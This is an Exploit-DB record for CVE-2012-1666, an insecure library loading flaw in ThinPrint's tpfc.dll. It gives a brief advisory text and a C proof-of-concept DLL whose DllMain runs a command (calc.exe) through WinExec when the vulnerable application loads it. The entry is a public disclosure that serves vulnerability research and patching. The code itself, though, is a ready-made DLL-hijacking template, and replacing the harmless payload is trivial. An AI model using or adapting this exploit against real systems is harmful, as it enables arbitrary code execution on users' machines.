ThinPrint 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution Vulnerability

2012-09-04T00:00:00
ID EDB-ID:37780
Type exploitdb
Reporter Moshe Zioni
Modified 2012-09-04T00:00:00

Description

ThinPrint 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution Vulnerability. CVE-2012-1666. Local exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/55421/info

ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.

Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application. 

#include <windows.h> 

	int hijack_poc () 
	{ 
	  WinExec ( "calc.exe" , SW_NORMAL );
	  return 0 ; 
	} 
	  
	BOOL WINAPI DllMain 
		 (	HINSTANCE hinstDLL , 
			DWORD dwReason ,
			LPVOID lpvReserved ) 
	{ 
	  hijack_poc () ;
	  return 0 ;
	}